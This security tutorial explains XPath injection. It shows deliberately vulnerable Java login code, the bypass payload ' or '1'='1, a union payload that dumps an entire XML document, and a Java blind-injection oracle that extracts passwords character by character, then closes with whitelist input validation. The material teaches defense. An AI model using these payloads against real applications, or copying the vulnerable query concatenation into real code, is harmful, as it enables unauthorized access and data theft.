By Chris Gates, CISSP, CPTS, CEH
WTF is XPath Injection?
Data can be stored in an XML file instead of an SQL database. To sort through complex XML documents, developers created the XPath language.
http://www.w3.org/TR/xpath
XPath is a query language for XML documents, much like SQL is a query language for databases. Instead of tables, columns, and rows, XML files have nodes in a tree. And like SQL, XPath is open to injection if user input is placed into queries without being properly sanitized.
Why is XPath Injection so dangerous?
- XPath 1.0 is a standard language. SQL has many dialects all based on a common, relatively weak syntax.
- XPath 1.0 allows one to query all items of the database (XML objects). In some SQL dialects, it is impossible to query for some objects of the database using an SQL SELECT query (e.g. older versions of MySQL do not provide a table of tables).
- XPath 1.0 has no access control for the database, while in SQL, some parts of the database may be inaccessible to the application due to lack of privileges.
Example #1 from Hacking Exposed: Web 2.0
A simple example of an XML database and authentication that uses it:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
</users>
And some code to use it as an authentication database:
import java.io.*;
import javax.xml.xpath.*;
import org.xml.sax.InputSource;

String username = req.getParameter("username");
String password = req.getParameter("password");
XPathFactory factory = XPathFactory.newInstance();
XPath xpath = factory.newXPath();
File file = new File("/usr/webappdata/users.xml");
InputSource src = new InputSource(new FileInputStream(file));
// Vulnerable: the user input is concatenated into the XPath expression unescaped.
XPathExpression expr = xpath.compile("//user[username/text()='" + username + "' and password/text()='" + password + "']/id/text()");
String id = expr.evaluate(src);
This code loads the XML document and queries it for the ID associated with the provided username and password. Assuming the username is "admin" and the password is "xp8th!", the query would be:
//user[username/text()='admin' and password/text()='xp8th!']/id/text()
Nothing is escaped, so you can place any data or XPath syntax into the query, such as ' or '1'='1 in the password field:
//user[username/text()='admin' and password/text()='' or '1'='1']/id/text()
Because "and" binds more tightly than "or" in XPath, the predicate reads (username is "admin" and password is empty) or '1'='1', and the second half is always true. Every user node matches, and evaluate() returns the string value of the first match in document order, which is the admin's ID. You get the admin's ID without knowing the admin's password.
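The bypass described above can be reproduced in a few lines. The following is a minimal sketch, not the book's code: the class name XPathAuthBypassDemo, the helper lookupId, and the in-memory copy of users.xml (with the whitespace inside the elements trimmed) are assumptions made for illustration, and the query selects user elements so that it matches the document structure.

```java
import java.io.StringReader;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.xml.sax.InputSource;

class XPathAuthBypassDemo {
    // Hypothetical in-memory stand-in for /usr/webappdata/users.xml.
    static final String USERS_XML =
        "<users>"
        + "<user><id>1</id><username>admin</username><password>xp8th!</password></user>"
        + "<user><id>2</id><username>test</username><password>test987</password></user>"
        + "<user><id>3</id><username>bigolnerd</username><password>nerdsneedlovetoo</password></user>"
        + "</users>";

    // Builds the query by string concatenation, which is the vulnerable pattern.
    static String lookupId(String username, String password) {
        String query = "//user[username/text()='" + username
            + "' and password/text()='" + password + "']/id/text()";
        try {
            XPath xpath = XPathFactory.newInstance().newXPath();
            return xpath.evaluate(query, new InputSource(new StringReader(USERS_XML)));
        } catch (XPathExpressionException e) {
            throw new IllegalArgumentException("bad XPath: " + query, e);
        }
    }

    public static void main(String[] args) {
        System.out.println("valid login: [" + lookupId("admin", "xp8th!") + "]");      // [1]
        System.out.println("wrong pass:  [" + lookupId("admin", "nope") + "]");        // []
        System.out.println("injected:    [" + lookupId("admin", "' or '1'='1") + "]"); // [1]
    }
}
```

The injected call returns the first ID in the document whatever username is supplied, because the always-true clause makes every user node match.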
Sample command-line XPath queries on the users.xml document
An XPath query to see the root node would be:
cg@segfault:~$ xpath -e / users.xml
Found 1 nodes in users.xml:
-- NODE --
<users>
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
</users>
An XPath query to see the three user nodes would be:
cg@segfault:~$ xpath -e /users/user users.xml
Found 3 nodes in users.xml:
-- NODE --
<user>
<id> 1 </id>
<username> admin </username>
<password> xp8th! </password>
</user>
-- NODE --
<user>
<id> 2 </id>
<username> test </username>
<password> test987 </password>
</user>
-- NODE --
<user>
<id> 3 </id>
<username> bigolnerd </username>
<password> nerdsneedlovetoo </password>
</user>
An XPath query to retrieve just the usernames would be:
/users/user/username
cg@segfault:~$ xpath -e /users/user/username users.xml
Found 3 nodes in users.xml:
-- NODE --
<username> admin </username>
-- NODE --
<username> test </username>
-- NODE --
<username> bigolnerd </username>
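The same queries can be run from Java with the standard javax.xml.xpath API. This is a rough sketch under assumptions: XPathQueryDemo and select are hypothetical names, and the document is an in-memory copy of users.xml with the whitespace inside the elements trimmed.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class XPathQueryDemo {
    // Hypothetical in-memory stand-in for users.xml.
    static final String USERS_XML =
        "<users>"
        + "<user><id>1</id><username>admin</username><password>xp8th!</password></user>"
        + "<user><id>2</id><username>test</username><password>test987</password></user>"
        + "<user><id>3</id><username>bigolnerd</username><password>nerdsneedlovetoo</password></user>"
        + "</users>";

    // Evaluates an XPath expression and returns the text content of each matched node.
    static List<String> select(String expression) {
        try {
            XPath xpath = XPathFactory.newInstance().newXPath();
            NodeList nodes = (NodeList) xpath.evaluate(
                expression,
                new InputSource(new StringReader(USERS_XML)),
                XPathConstants.NODESET);
            List<String> values = new ArrayList<>();
            for (int i = 0; i < nodes.getLength(); i++) {
                values.add(nodes.item(i).getTextContent());
            }
            return values;
        } catch (XPathExpressionException e) {
            throw new IllegalArgumentException("bad XPath: " + expression, e);
        }
    }

    public static void main(String[] args) {
        System.out.println(select("/users/user").size());    // 3
        System.out.println(select("/users/user/username"));  // [admin, test, bigolnerd]
    }
}
```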
Example #2 (from Resource #5)
The XML document:
<?xml version="1.0" encoding="utf-8" ?>
<orders>
<customer id="1">
<name>Bob Smith</name>
<email>...</email>
<creditcard>1234567812345678</creditcard>
<order>
<item>
<quantity>1</quantity>
<price>10.00</price>
<name>Sprocket</name>
</item>
<item>
<quantity>2</quantity>
<price>9.00</price>
<name>Cog</name>
</item>
</order>
</customer>
...
</orders>
The website allows its users to search for items in their order history based on price. The XPath query that the application performs looks like this:
string query = "/orders/customer[@id='" + customerId + "']/order/item[price >= '" + priceFilter + "']";
If the customerId and priceFilter values are not properly validated, an attacker can exploit the XPath injection vulnerability. Entering the following value for either parameter will select the entire XML document and return it to the attacker:
'] | /* | /foo[bar='
With the value injected as customerId, our query becomes:
string query = "/orders/customer[@id=''] | /* | /foo[bar='']/order/item[price >= '" + priceFilter + "']";
With one simple query the entire XML “database” has been returned.
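To see why the union operator hands back everything, here is a small Java sketch of the same query. It is an illustration under assumptions, not the original application's code: the class XPathUnionInjectionDemo, its helpers, and the shortened in-memory orders document are hypothetical.

```java
import java.io.StringReader;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

class XPathUnionInjectionDemo {
    // Hypothetical, shortened copy of the orders document (one customer, no email).
    static final String ORDERS_XML =
        "<orders><customer id=\"1\"><name>Bob Smith</name>"
        + "<creditcard>1234567812345678</creditcard><order>"
        + "<item><quantity>1</quantity><price>10.00</price><name>Sprocket</name></item>"
        + "<item><quantity>2</quantity><price>9.00</price><name>Cog</name></item>"
        + "</order></customer></orders>";

    // Same concatenation pattern as the vulnerable query in the text.
    static String buildQuery(String customerId, String priceFilter) {
        return "/orders/customer[@id='" + customerId
            + "']/order/item[price >= '" + priceFilter + "']";
    }

    static NodeList search(String customerId, String priceFilter) {
        String query = buildQuery(customerId, priceFilter);
        try {
            XPath xpath = XPathFactory.newInstance().newXPath();
            return (NodeList) xpath.evaluate(
                query, new InputSource(new StringReader(ORDERS_XML)), XPathConstants.NODESET);
        } catch (XPathExpressionException e) {
            throw new IllegalArgumentException("bad XPath: " + query, e);
        }
    }

    public static void main(String[] args) {
        // Intended use: items priced at 9.50 or more for customer 1.
        System.out.println(search("1", "9.50").getLength());          // 1 (the Sprocket item)

        // Injection: the middle branch of the union, /*, selects the document root.
        NodeList leaked = search("'] | /* | /foo[bar='", "9.50");
        System.out.println(leaked.item(0).getNodeName());             // orders
        System.out.println(leaked.item(0).getTextContent().contains("1234567812345678")); // true
    }
}
```

The first and third branches of the union match nothing; they exist only to keep the surrounding quotes and brackets balanced so the expression still parses.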
Why the heck would someone use an XML file instead of a database???
Many XML applications build on raw XML dumps from databases and legacy applications. The idea is that you can dump EVERYTHING into an XML file and then use an application or some code to parse through it for the data you need. The problem is that there is no access control in XML: if your application or code reads the full XML document, any data in the document could potentially be viewed (see Blind XPath Injection).
If your website uses an XML (Extensible Markup Language) document to store data and user input is included in an XPath query against that document, you may be vulnerable to an XPath injection.
How do you discover that a site is using XPath or an XML database?
The following tools can help test for it:
- SecurityQAToolbar
- Acunetix Web Scanner
- Foundstone WSDigger
- Wapiti
Blind XPath
Blind XPath Injection allows an attacker, given an XPath engine used to query an XML document, to retrieve all contents of the document without any specific knowledge of the XPath queries that the application uses. Blind XPath Injection can work even if the application's queries themselves are all limited to a document subset.
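One way to picture a blind attack is as a series of yes/no questions. The sketch below is an assumption-laden illustration rather than the method from any particular paper or tool: BlindXPathDemo, login, ask, and extract are hypothetical names, the target is the vulnerable login query from Example #1 run against an in-memory document, and the attacker is assumed to see only whether the login succeeded. The string-length() and substring() functions are standard XPath 1.0.

```java
import java.io.StringReader;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.xml.sax.InputSource;

class BlindXPathDemo {
    // Hypothetical in-memory stand-in for the users.xml document.
    static final String USERS_XML =
        "<users>"
        + "<user><id>1</id><username>admin</username><password>xp8th!</password></user>"
        + "<user><id>2</id><username>test</username><password>test987</password></user>"
        + "</users>";
    static final String ALPHABET =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_-";

    // The application: the attacker only learns whether the login succeeded.
    static boolean login(String username, String password) {
        String query = "//user[username/text()='" + username
            + "' and password/text()='" + password + "']/id/text()";
        try {
            XPath xpath = XPathFactory.newInstance().newXPath();
            return !xpath.evaluate(query, new InputSource(new StringReader(USERS_XML))).isEmpty();
        } catch (XPathExpressionException e) {
            return false; // a malformed query just looks like a failed login
        }
    }

    // Turns the login form into an oracle: true exactly when the condition holds.
    static boolean ask(String condition) {
        return login("x", "' or " + condition + " or 'a'='b");
    }

    // Recovers the string value of an XPath expression one character at a time.
    static String extract(String path) {
        int length = 0;
        while (length < 64 && !ask("string-length(" + path + ")=" + length)) {
            length++;
        }
        StringBuilder value = new StringBuilder();
        for (int pos = 1; pos <= length; pos++) {
            char found = '?'; // placeholder if the character is outside ALPHABET
            for (char c : ALPHABET.toCharArray()) {
                if (ask("substring(" + path + "," + pos + ",1)='" + c + "'")) {
                    found = c;
                    break;
                }
            }
            value.append(found);
        }
        return value.toString();
    }

    public static void main(String[] args) {
        System.out.println(extract("name(/*)"));                 // users
        System.out.println(extract("/users/user[1]/username"));  // admin
        System.out.println(extract("/users/user[1]/password"));  // xp8th!
    }
}
```

The sketch passes known paths to extract for brevity. A fully blind attacker would first recover element names and child counts with the same oracle, then build the paths from them.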
Defenses
The best way to defend against any kind of command/script injection is to sanitize user input, and the most reliable way to do that is to create a whitelist of allowable characters instead of a blacklist of unallowable ones. Whitelisting means allowing specific data for specific fields. For example, if the input is a credit card number we allow only [0-9]; if it is letters only, we allow only [A-Za-z].
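A whitelist check can be as small as one regular expression per field. The following is a minimal sketch, assuming hypothetical field rules (the class name InputWhitelist, the patterns, and the length limits are illustrative choices, not requirements from any standard):

```java
import java.util.regex.Pattern;

class InputWhitelist {
    // Hypothetical per-field rules; tune them to what each field may legitimately contain.
    static final Pattern USERNAME = Pattern.compile("[A-Za-z0-9]{1,32}");
    static final Pattern CARD_NUMBER = Pattern.compile("[0-9]{13,19}");

    // True only if the whole value consists of allowed characters.
    static boolean isAllowed(Pattern allowed, String value) {
        return value != null && allowed.matcher(value).matches();
    }

    // Rejects the request outright instead of trying to repair bad input.
    static String requireAllowed(Pattern allowed, String value, String fieldName) {
        if (!isAllowed(allowed, value)) {
            throw new IllegalArgumentException("invalid characters in " + fieldName);
        }
        return value;
    }

    public static void main(String[] args) {
        System.out.println(isAllowed(USERNAME, "admin"));                   // true
        System.out.println(isAllowed(USERNAME, "' or '1'='1"));             // false
        System.out.println(isAllowed(CARD_NUMBER, "1234567812345678"));     // true
        System.out.println(isAllowed(CARD_NUMBER, "'] | /* | /foo[bar='")); // false
    }
}
```

The check runs before the value is concatenated into any XPath expression. Fields such as passwords usually need a wider character set, but the pattern for them should still exclude the quote characters that delimit XPath string literals.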
Resources
1. http://www.ibm.com/developerworks/xml/library/x-think37/index.html
2. http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html?ca=dnw-828
3. http://www.packetstormsecurity.org/papers/bypass/Blind_XPath_Injection_20040518.pdf
4. WASC XPath Injection http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml
5. http://www.site-reference.com/articles/Website-Development/Malicious-Code-Injection-It-s-Not-Just-for-SQL-Anymore.html
6. XPath Tutorial http://www.w3schools.com/xpath/
7. Getting started with XPath 2.0 http://www.ibm.com/developerworks/library/x-wxxm35.html
8. XPath Injection in XML Databases http://palisade.plynt.com/issues/2005Jul/xpath-injection/
Image of "Not XML Button" from Adam Kalsey's blog.